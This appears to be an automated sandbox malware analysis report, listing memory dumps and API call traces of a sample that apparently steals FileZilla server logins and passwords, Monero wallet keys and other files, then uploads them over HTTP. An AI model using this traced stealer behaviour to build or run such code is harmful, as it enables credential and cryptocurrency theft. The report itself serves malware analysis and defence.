                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07f7f11a1f98477b77591fc7671da17ca2de9059e281c8efd95e39888d01c100
                            • Instruction ID: 6a1311e9b898199763e58b3a3968ee56aea3cde098b70b9e473040051379150e
                            • Opcode Fuzzy Hash: 07f7f11a1f98477b77591fc7671da17ca2de9059e281c8efd95e39888d01c100
                            • Instruction Fuzzy Hash: 3031BEF3F046141BF304896AED947A7B68BD7D4321F2B85398E88977C5E8BE5C0502D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: edeacf859751e83f70a714f0cc7f74e339a05ce29dccfdfc8e4cdc8c7e19681f
                            • Instruction ID: e354a4a83ed9aefffe0a8d5a538665341f6fb2734cc6e66a3bb2f50ef4c20a9e
                            • Opcode Fuzzy Hash: edeacf859751e83f70a714f0cc7f74e339a05ce29dccfdfc8e4cdc8c7e19681f
                            • Instruction Fuzzy Hash: 4D2105F3E0921447F354A97AEC85766B2869BD0720F2F823D8F59677C0EC7D58058286
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00F50DBF,00F50DBE,00F50DBB,00F50DBA), ref: 00F404C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F404C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F404E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F404F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F4052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F4053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00F40579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F405C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F405D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F4067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F40692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F406AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00F406C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 00F406D1
                            • lstrcat.KERNEL32(?,url: ), ref: 00F406E0
                            • lstrcat.KERNEL32(?,00000000), ref: 00F406F3
                            • lstrcat.KERNEL32(?,00F51770), ref: 00F40702
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40715
                            • lstrcat.KERNEL32(?,00F51774), ref: 00F40724
                            • lstrcat.KERNEL32(?,login: ), ref: 00F40733
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40746
                            • lstrcat.KERNEL32(?,00F51780), ref: 00F40755
                            • lstrcat.KERNEL32(?,password: ), ref: 00F40764
                            • lstrcat.KERNEL32(?,00000000), ref: 00F40777
                            • lstrcat.KERNEL32(?,00F51790), ref: 00F40786
                            • lstrcat.KERNEL32(?,00F51794), ref: 00F40795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F50DB7), ref: 00F407EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 9f18f33b242f147a6df75371b1761ecf0ca653336566f934811fb2e32fe7d9a3
                            • Instruction ID: 50c2606c82d5f377c4ccf0aaf7f041d3eb3a920b3d34584cab9c02c2dc360dac
                            • Opcode Fuzzy Hash: 9f18f33b242f147a6df75371b1761ecf0ca653336566f934811fb2e32fe7d9a3
                            • Instruction Fuzzy Hash: FAD13171D40108ABDB14EBF4DD9AEEE7B39BF54301F008554FA02A6096DF38BA09DB61
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F35A48
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F35A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F35BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0098E530,00000000,?,00989948,00000000,?,00F51B4C), ref: 00F35EC1
                            • lstrlen.KERNEL32(00000000), ref: 00F35ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F35EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F35EEA
                            • lstrlen.KERNEL32(00000000), ref: 00F35EFF
                            • lstrlen.KERNEL32(00000000), ref: 00F35F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F35F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00F35F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F35F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F35F9C
                            • InternetCloseHandle.WININET(00000000), ref: 00F36000
                            • InternetCloseHandle.WININET(00000000), ref: 00F3600D
                            • HttpOpenRequestA.WININET(00000000,0098E440,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F35C48
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00F36017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: d11196e4b6143e931ea4dbee4c8b76e0313bcedc03146ca43ba5e67c5b4fcf19
                            • Instruction ID: 6fe44051867904c8c10de77a4f348b757aafe580cb1096d9e8dbdb37737ffd95
                            • Opcode Fuzzy Hash: d11196e4b6143e931ea4dbee4c8b76e0313bcedc03146ca43ba5e67c5b4fcf19
                            • Instruction Fuzzy Hash: B7123E72960528ABDB15EBA0DCA6FEEB739BF54700F004199F50663092EF346A48DF61
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F3D1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F3D1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D308
                            • lstrcat.KERNEL32(?,00F51570), ref: 00F3D317
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D32A
                            • lstrcat.KERNEL32(?,00F51574), ref: 00F3D339
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D34C
                            • lstrcat.KERNEL32(?,00F51578), ref: 00F3D35B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D36E
                            • lstrcat.KERNEL32(?,00F5157C), ref: 00F3D37D
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D390
                            • lstrcat.KERNEL32(?,00F51580), ref: 00F3D39F
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D3B2
                            • lstrcat.KERNEL32(?,00F51584), ref: 00F3D3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D3D4
                            • lstrcat.KERNEL32(?,00F51588), ref: 00F3D3E3
                              • Part of subcall function 00F4AB30: lstrlen.KERNEL32(00F34F55,?,?,00F34F55,00F50DDF), ref: 00F4AB3B
                              • Part of subcall function 00F4AB30: lstrcpy.KERNEL32(00F50DDF,00000000), ref: 00F4AB95
                            • lstrlen.KERNEL32(?), ref: 00F3D42A
                            • lstrlen.KERNEL32(?), ref: 00F3D439
                              • Part of subcall function 00F4AD80: StrCmpCA.SHLWAPI(00000000,00F51568,00F3D2A2,00F51568,00000000), ref: 00F4AD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3D4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: c7277f50de350334acf8f8a3de7f9de635859f114c42bd77268bcb2eb9ae10ec
                            • Instruction ID: 600700296369ce8be07916d8f14750e534fc64022ec5e4a6f6ce1cba64371200
                            • Opcode Fuzzy Hash: c7277f50de350334acf8f8a3de7f9de635859f114c42bd77268bcb2eb9ae10ec
                            • Instruction Fuzzy Hash: 56E15371950108AFDB15EBA0ED9AEEE7739BF54301F004654F90676092EF39BE08DB62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0098CD90,00000000,?,00F51544,00000000,?,?), ref: 00F3CB6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F3CB89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00F3CB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F3CBA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F3CBD9
                            • StrStrA.SHLWAPI(?,0098CCB8,00F50B56), ref: 00F3CBF7
                            • StrStrA.SHLWAPI(00000000,0098CCE8), ref: 00F3CC1E
                            • StrStrA.SHLWAPI(?,0098D458,00000000,?,00F51550,00000000,?,00000000,00000000,?,00988A40,00000000,?,00F5154C,00000000,?), ref: 00F3CDA2
                            • StrStrA.SHLWAPI(00000000,0098D6D8), ref: 00F3CDB9
                              • Part of subcall function 00F3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F3C971
                              • Part of subcall function 00F3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F3C97C
                            • StrStrA.SHLWAPI(?,0098D6D8,00000000,?,00F51554,00000000,?,00000000,00988B30), ref: 00F3CE5A
                            • StrStrA.SHLWAPI(00000000,009889C0), ref: 00F3CE71
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B47), ref: 00F3CA43
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B4B), ref: 00F3CA57
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B4E), ref: 00F3CA78
                            • lstrlen.KERNEL32(00000000), ref: 00F3CF44
                            • CloseHandle.KERNEL32(00000000), ref: 00F3CF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
